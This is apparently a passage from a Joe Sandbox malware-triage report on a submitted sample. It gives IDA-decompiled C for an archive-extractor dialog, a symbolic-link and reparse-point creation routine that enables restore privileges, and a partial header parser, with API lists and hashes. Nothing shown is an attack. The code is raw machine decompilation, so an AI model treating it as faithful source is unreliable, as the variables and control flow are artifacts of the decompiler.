				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x00bba2a4
0x00bba2ac
0x00bba2b0

APIs

SetCurrentDirectoryW.KERNELBASE(?,00BBA507,C:\Users\user\Desktop,00000000,00BE846A,00000006), ref: 00BBA2A4

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 827ee23ea2fbeac868e06b4ad41daee3ea0ca47dfaad206d8a9adcf330a4741f
Instruction ID: bac837a54b97858f2964a63e440985f0cc46c9cc6bad787df78c0a3acf2681b6
Opcode Fuzzy Hash: 827ee23ea2fbeac868e06b4ad41daee3ea0ca47dfaad206d8a9adcf330a4741f
Instruction Fuzzy Hash: 54A01230195006468A000B30CC09C15B7515770702F00C6217102C10A0DF308810A500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BBB820 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00BBB820(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E00BBE1C0();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E00BA130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E00BAFD96( &_a2640, _a6752, 0x800);
						E00BABC9B( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0xc01080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00BA3FD6( &_a900, 0x200, L"%s %s %s", E00BADD11(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00BBA5BC(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00BADD11(0 + _a344, 0x98));
								_t151 = 0x200;
								E00BA3FD6( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0xbe7464; // 0x0
							E00BB0B3D(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00BA3FD6( &_a896, _t151, L"%s %s %s", E00BADD11(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0xbfcc84;
							_t158 =  *0xbfcc80;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E00BBA5BC(_t158, _t154,  &_a212, 0x32);
								_push(E00BADD11(_t154, 0x98));
								E00BA3FD6( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xc010cc(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x00bbb820
0x00bbb820
0x00bbb825
0x00bbb82b
0x00bbb834
0x00bbb83e
0x00bbb85d
0x00bbb867
0x00bbb86d
0x00bbb8e7
0x00bbb902
0x00bbb911
0x00bbb921
0x00bbb942
0x00bbb958
0x00bbb974
0x00bbb979
0x00bbb98c
0x00bbb99c
0x00bbb9a2
0x00bbb9a8
0x00bbb9a9
0x00bbb9ae
0x00bbb9b1
0x00bbb9b8
0x00bbb9d4
0x00bbb9de
0x00bbb9e6
0x00bbba04
0x00bbba09
0x00bbba17
0x00bbba1e
0x00bbba2c
0x00bbba92
0x00bbba2e
0x00bbba48
0x00bbba4c
0x00bbba5b
0x00bbba63
0x00bbba77
0x00bbba7c
0x00bbba8a
0x00bbba8a
0x00bbbaa7
0x00bbbaad
0x00bbbab8
0x00bbbac7
0x00bbbad7
0x00bbbaf1
0x00bbbb09
0x00bbbb13
0x00bbbb1b
0x00bbbb35
0x00bbbb3a
0x00bbbb48
0x00bbbb56
0x00bbbb5c
0x00bbbb62
0x00bbbb76
0x00bbbb85
0x00bbbb9c
0x00bbbba1
0x00bbbbaf
0x00bbbbaf
0x00bbbb62
0x00bbbbb5
0x00bbbbb5
0x00bbbbb7
0x00bbbbc1
0x00bbbbc1
0x00bbb872
0x00000000
0x00000000
0x00bbb87d
0x00bbb87e
0x00bbb880
0x00bbb8a4
0x00bbb8a4
0x00bbb8a6
0x00bbb8a6
0x00bbb8a7
0x00bbb8b1
0x00bbb8b9
0x00bbb8bc
0x00bbb8bc
0x00bbb8c4
0x00000000
0x00bbb8c4
0x00bbb882
0x00bbb885
0x00bbb8d9
0x00000000
0x00bbb8d9
0x00bbb887
0x00bbb88a
0x00bbb8d6
0x00000000
0x00bbb8d6
0x00bbb88c
0x00bbb88f
0x00bbb8d0
0x00000000
0x00bbb8d0
0x00bbb891
0x00bbb894
0x00000000
0x00000000
0x00bbb896
0x00bbb899
0x00bbb8cc
0x00000000
0x00bbb8cc
0x00bbb89e
0x00000000
0x00000000
0x00000000
0x00bbb89e
0x00bbb85f
0x00bbb861
0x00000000

APIs

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BBB8B1
EndDialog.USER32(?,00000006), ref: 00BBB8C4
GetDlgItem.USER32(?,0000006C), ref: 00BBB8E0
SetFocus.USER32(00000000), ref: 00BBB8E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00BBB921
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BBB958
FindFirstFileW.KERNEL32(?,?), ref: 00BBB96E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBB98C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBB99C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBB9B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBB9D4
_swprintf.LIBCMT ref: 00BBBA04

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BBBA17
FindClose.KERNEL32(00000000), ref: 00BBBA1E
_swprintf.LIBCMT ref: 00BBBA77
SetDlgItemTextW.USER32(?,00000068,?), ref: 00BBBA8A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BBBAA7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BBBAC7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBBAD7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBBAF1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBBB09
_swprintf.LIBCMT ref: 00BBBB35
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BBBB48
_swprintf.LIBCMT ref: 00BBBB9C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00BBBBAF

Part of subcall function 00BBA5BC: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBA5E2
Part of subcall function 00BBA5BC: GetNumberFormatW.KERNEL32 ref: 00BBA631

Strings

%s %s %s, xrefs: 00BBB9F2, 00BBBB27
REPLACEFILEDLG, xrefs: 00BBB847
%s %s, xrefs: 00BBBA69, 00BBBB8E

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: a1f97b2e82060cb339dde32f41aad9a8b6765445467add3ef3689b8477ab9ff3
Instruction ID: 9f66a45fc41e1164982d1462465c6c83a3f1cb83403bb40d27e081d165688241
Opcode Fuzzy Hash: a1f97b2e82060cb339dde32f41aad9a8b6765445467add3ef3689b8477ab9ff3
Instruction Fuzzy Hash: 34915272548349BBD6219BA0DD89FFFB7ECEB4A704F04485AF789D2081D7B19604C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BA7165 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BA7165(void* __edx) {
				void* __esi;
				signed int _t108;
				void* _t110;
				intOrPtr _t113;
				int _t115;
				intOrPtr _t118;
				signed int _t136;
				int _t142;
				void* _t176;
				void* _t179;
				void* _t184;
				short _t185;
				intOrPtr _t191;
				void* _t196;
				void* _t197;
				void* _t216;
				void* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t222;
				WCHAR* _t223;
				intOrPtr _t227;
				short _t231;
				void* _t232;
				intOrPtr _t233;
				short _t235;
				void* _t236;
				void* _t238;
				void* _t239;

				_t217 = __edx;
				E00BBE0E4(E00BD1C05, _t236);
				E00BBE1C0();
				 *((intOrPtr*)(_t236 - 0x1c)) = 1;
				if( *0xbdfeb3 == 0) {
					E00BA7BCE(L"SeRestorePrivilege");
					E00BA7BCE(L"SeCreateSymbolicLinkPrivilege");
					 *0xbdfeb3 = 1;
				}
				_t193 = _t236 - 0x30;
				E00BA7076(_t236 - 0x30, 0x1418);
				_t191 =  *((intOrPtr*)(_t236 + 0x10));
				 *(_t236 - 4) =  *(_t236 - 4) & 0x00000000;
				E00BAFD96(_t236 - 0x1080, _t191 + 0x1104, 0x800);
				 *((intOrPtr*)(_t236 - 0x18)) = E00BC33F3(_t236 - 0x1080);
				_t226 = _t236 - 0x1080;
				_t222 = _t236 - 0x2080;
				_t108 = E00BC5668(_t236 - 0x1080, L"\\??\\", 4);
				_t239 = _t238 + 0x10;
				asm("sbb al, al");
				_t110 =  ~_t108 + 1;
				 *(_t236 - 0x10) = _t110;
				if(_t110 != 0) {
					_t226 = _t236 - 0x1078;
					_t184 = E00BC5668(_t236 - 0x1078, L"UNC\\", 4);
					_t239 = _t239 + 0xc;
					if(_t184 == 0) {
						_t185 = 0x5c;
						 *((short*)(_t236 - 0x2080)) = _t185;
						_t222 = _t236 - 0x207e;
						_t226 = _t236 - 0x1072;
					}
				}
				E00BC5646(_t222, _t226);
				_t113 = E00BC33F3(_t236 - 0x2080);
				_t227 =  *((intOrPtr*)(_t236 + 8));
				_t223 =  *(_t236 + 0xc);
				 *((intOrPtr*)(_t236 - 0x14)) = _t113;
				if( *((char*)(_t227 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t223);
					E00BA9F8F(_t193, _t236);
					if( *((char*)(_t191 + 0x10f1)) != 0 ||  *((char*)(_t191 + 0x2104)) != 0) {
						_t115 = CreateDirectoryW(_t223, 0);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t176 = CreateFileW(_t223, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t176 == 0xffffffff) {
							L27:
							 *((char*)(_t236 - 0x1c)) = 0;
							L28:
							E00BA15D1(_t236 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t236 - 0xc));
							return  *((intOrPtr*)(_t236 - 0x1c));
						}
						CloseHandle(_t176);
						L14:
						_t118 =  *((intOrPtr*)(_t191 + 0x1100));
						if(_t118 != 3) {
							__eflags = _t118 - 2;
							if(_t118 == 2) {
								L18:
								_t196 =  *(_t236 - 0x30);
								_t218 =  *((intOrPtr*)(_t236 - 0x18));
								 *_t196 = 0xa000000c;
								_t231 = _t218 + _t218;
								 *((short*)(_t196 + 0xa)) = _t231;
								 *((short*)(_t196 + 4)) = 0x10 + ( *((intOrPtr*)(_t236 - 0x14)) + _t218) * 2;
								 *((intOrPtr*)(_t196 + 6)) = 0;
								E00BC5646(_t196 + 0x14, _t236 - 0x1080);
								_t60 = _t231 + 2; // 0x3
								_t232 =  *(_t236 - 0x30);
								 *((short*)(_t232 + 0xc)) = _t60;
								 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
								E00BC5646(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 0xb) * 2, _t236 - 0x2080);
								_t136 =  *(_t236 - 0x10) & 0x000000ff ^ 0x00000001;
								__eflags = _t136;
								 *(_t232 + 0x10) = _t136;
								L19:
								_t197 = CreateFileW(_t223, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t236 - 0x10) = _t197;
								if(_t197 == 0xffffffff) {
									goto L27;
								}
								_t142 = DeviceIoControl(_t197, 0x900a4, _t232, ( *(_t232 + 4) & 0x0000ffff) + 8, 0, 0, _t236 - 0x34, 0);
								_t256 = _t142;
								if(_t142 != 0) {
									E00BA95B6(_t236 - 0x30a4);
									 *(_t236 - 4) = 1;
									E00BA7BAD(_t236 - 0x30a4,  *(_t236 - 0x10));
									_t233 =  *((intOrPtr*)(_t236 + 8));
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00BA9CA2(_t236 - 0x30a4, _t233,  ~( *(_t233 + 0x72c8)) & _t191 + 0x00001040,  ~( *(_t233 + 0x72cc)) & _t191 + 0x00001048,  ~( *(_t233 + 0x72d0)) & _t191 + 0x00001050);
									E00BA9670(_t236 - 0x30a4);
									__eflags =  *((char*)(_t233 + 0x61a0));
									if( *((char*)(_t233 + 0x61a0)) == 0) {
										E00BAA384(_t223,  *((intOrPtr*)(_t191 + 0x24)));
									}
									E00BA95E8(_t236 - 0x30a4, _t233);
									goto L28;
								}
								CloseHandle( *(_t236 - 0x10));
								E00BA7032(_t256, 0x15, 0, _t223);
								_t154 = GetLastError();
								if(_t154 == 5 || _t154 == 0x522) {
									if(E00BAFF7D() == 0) {
										E00BA159C(_t236 - 0x80, 0x18);
										_t154 = E00BB0D97(_t236 - 0x80);
									}
								}
								E00BC2DC0(_t154);
								E00BA6F5B(0xbdff50, 9);
								_push(_t223);
								if( *((char*)(_t191 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t118 - 1;
							if(_t118 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t216 =  *(_t236 - 0x30);
						_t220 =  *((intOrPtr*)(_t236 - 0x18));
						 *_t216 = 0xa0000003;
						_t235 = _t220 + _t220;
						 *((short*)(_t216 + 0xa)) = _t235;
						 *((short*)(_t216 + 4)) = 0xc + ( *((intOrPtr*)(_t236 - 0x14)) + _t220) * 2;
						 *((intOrPtr*)(_t216 + 6)) = 0;
						E00BC5646(_t216 + 0x10, _t236 - 0x1080);
						_t40 = _t235 + 2; // 0x3
						_t232 =  *(_t236 - 0x30);
						 *((short*)(_t232 + 0xc)) = _t40;
						 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
						E00BC5646(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 9) * 2, _t236 - 0x2080);
						goto L19;
					}
				}
				if( *(_t236 - 0x10) != 0) {
					goto L27;
				}
				_t179 = E00BAB772(_t191 + 0x1104);
				_t249 = _t179;
				if(_t179 != 0) {
					goto L27;
				}
				_push(_t191 + 0x1104);
				_push(_t223);
				_push(_t191 + 0x28);
				_push(_t227);
				if(E00BA798B(_t217, _t249) == 0) {
					goto L27;
				}
				goto L9;
			}

0x00ba7165
0x00ba716a
0x00ba7174
0x00ba7186
0x00ba7189
0x00ba7190
0x00ba719a
0x00ba719f
0x00ba719f
0x00ba71aa
0x00ba71ad
0x00ba71b2
0x00ba71b5
0x00ba71cc
0x00ba71df
0x00ba71e2
0x00ba71ea
0x00ba71f6
0x00ba71fb
0x00ba7200
0x00ba7202
0x00ba7204
0x00ba7209
0x00ba720d
0x00ba721b
0x00ba7220
0x00ba7225
0x00ba7229
0x00ba722a
0x00ba7231
0x00ba7237
0x00ba7237
0x00ba7225
0x00ba723f
0x00ba724b
0x00ba7250
0x00ba7256
0x00ba7259
0x00ba7263
0x00ba729d
0x00ba72a0
0x00ba72a1
0x00ba72a2
0x00ba72ae
0x00ba72e5
0x00ba72eb
0x00ba72ed
0x00000000
0x00000000
0x00000000
0x00ba72b9
0x00ba72ca
0x00ba72d3
0x00ba7492
0x00ba7492
0x00ba7496
0x00ba7499
0x00ba74a7
0x00ba74b1
0x00ba74b1
0x00ba72da
0x00ba72f3
0x00ba72f3
0x00ba72fc
0x00ba7364
0x00ba7367
0x00ba7371
0x00ba7371
0x00ba7374
0x00ba737c
0x00ba7382
0x00ba7385
0x00ba7390
0x00ba7396
0x00ba73a4
0x00ba73a9
0x00ba73ac
0x00ba73af
0x00ba73b8
0x00ba73cd
0x00ba73db
0x00ba73db
0x00ba73de
0x00ba73e1
0x00ba73f9
0x00ba73fb
0x00ba7401
0x00000000
0x00000000
0x00ba741f
0x00ba7425
0x00ba7427
0x00ba74c2
0x00ba74d0
0x00ba74d4
0x00ba74d9
0x00ba74ea
0x00ba74fd
0x00ba7510
0x00ba751b
0x00ba7526
0x00ba752b
0x00ba7532
0x00ba7538
0x00ba7538
0x00ba7543
0x00000000
0x00ba7543
0x00ba7430
0x00ba743b
0x00ba7440
0x00ba7449
0x00ba7459
0x00ba7460
0x00ba7468
0x00ba7468
0x00ba7459
0x00ba7474
0x00ba747d
0x00ba7489
0x00ba748a
0x00ba74b4
0x00ba748c
0x00ba748c
0x00ba748c
0x00000000
0x00ba748a
0x00ba7369
0x00ba736b
0x00000000
0x00000000
0x00000000
0x00ba736b
0x00ba72fe
0x00ba7301
0x00ba7309
0x00ba730f
0x00ba7312
0x00ba731d
0x00ba7323
0x00ba7331
0x00ba7336
0x00ba7339
0x00ba733c
0x00ba7345
0x00ba735a
0x00000000
0x00ba735f
0x00ba72ae
0x00ba7269
0x00000000
0x00000000
0x00ba7276
0x00ba727b
0x00ba727d
0x00000000
0x00000000
0x00ba7289
0x00ba728a
0x00ba728e
0x00ba728f
0x00ba7297
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00BA716A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00BA72CA
CloseHandle.KERNEL32(00000000), ref: 00BA72DA

Part of subcall function 00BA7BCE: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7BDD
Part of subcall function 00BA7BCE: GetLastError.KERNEL32 ref: 00BA7C23
Part of subcall function 00BA7BCE: CloseHandle.KERNEL32(?), ref: 00BA7C32

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00BA72E5
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BA73F3
DeviceIoControl.KERNEL32 ref: 00BA741F
CloseHandle.KERNEL32(?), ref: 00BA7430
GetLastError.KERNEL32(00000015,00000000,?), ref: 00BA7440
RemoveDirectoryW.KERNEL32(?), ref: 00BA748C
DeleteFileW.KERNEL32(?), ref: 00BA74B4

Strings

SeRestorePrivilege, xrefs: 00BA718B
UNC\, xrefs: 00BA7215
\??\, xrefs: 00BA71F0
SeCreateSymbolicLinkPrivilege, xrefs: 00BA7195

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 10697755766ed30d9dac4f9d5fd10b076cd993cb9e0460cb071f98328042a176
Instruction ID: 13b10d0e1c689e523de16a3c021d32a7a13bd3ea673952512b184b27bcd11d59
Opcode Fuzzy Hash: 10697755766ed30d9dac4f9d5fd10b076cd993cb9e0460cb071f98328042a176
Instruction Fuzzy Hash: B3B1AF71908254ABDF21DB64CC85FEEB7F8EF06300F1444AAF945E7242EB74AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA326D Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00BA326D(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t393;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int _t410;
				signed int _t420;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				intOrPtr _t501;
				signed int _t502;
				signed char _t503;
				unsigned int _t504;
				void* _t511;
				void* _t519;
				signed int _t522;
				void* _t523;
				signed int _t533;
				unsigned int _t536;
				void* _t541;
				intOrPtr _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				intOrPtr _t559;

				_t397 = __ecx;
				_t549 = _t548 - 0x68;
				E00BBE0E4(E00BD1B41, _t547);
				E00BBE1C0();
				_t395 = _t397;
				E00BAC4A5(_t547 + 0x30, _t395);
				 *(_t547 + 0x60) = 0;
				 *((intOrPtr*)(_t547 - 4)) = 0;
				if( *((intOrPtr*)(_t395 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t547 + 0x6a)) = 0;
					L16:
					_push(7);
					if(E00BAC6B0() >= 7) {
						 *(_t395 + 0x21f4) = 0;
						_t511 = _t395 + 0x21e4;
						 *_t511 = E00BAC520(_t547 + 0x30);
						_t533 = E00BAC68C(_t547 + 0x30, 4);
						_t242 = E00BAC620(_t500);
						__eflags = _t242 | _t500;
						if((_t242 | _t500) == 0) {
							L85:
							E00BA203A(_t395);
							L86:
							E00BA15D1(_t547 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t547 - 0xc));
							return  *(_t547 + 0x60);
						}
						__eflags = _t533;
						if(_t533 == 0) {
							goto L85;
						}
						_t42 = _t533 - 3; // -3
						_t536 = _t533 + 4 + _t242;
						_t410 = _t42 + _t242;
						__eflags = _t410;
						 *(_t547 + 0x64) = _t536;
						if(_t410 < 0) {
							goto L85;
						}
						__eflags = _t536 - 7;
						if(_t536 < 7) {
							goto L85;
						}
						_push(_t410);
						E00BAC6B0();
						__eflags =  *(_t547 + 0x48) - _t536;
						if( *(_t547 + 0x48) < _t536) {
							goto L17;
						}
						_t248 = E00BAC600(_t547 + 0x30);
						 *(_t395 + 0x21e8) = E00BAC620(_t500);
						_t250 = E00BAC620(_t500);
						 *(_t395 + 0x21ec) = _t250;
						__eflags =  *_t511 - _t248;
						 *(_t395 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t395 + 0x21f0) =  *(_t547 + 0x64);
						_t254 =  *(_t395 + 0x21e8);
						 *(_t395 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t511 != _t248;
						 *(_t547 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t395 + 0x21ec) & 0x00000001;
							 *(_t547 + 0x58) = 0;
							 *(_t547 + 0x54) = 0;
							if(( *(_t395 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t395 + 0x21ec) & 0x00000002;
								_t538 = _t256;
								 *(_t547 + 0x64) = _t256;
								 *(_t547 + 0x5c) = _t256;
								if(( *(_t395 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00BAC620(_t500);
									_t538 = _t362;
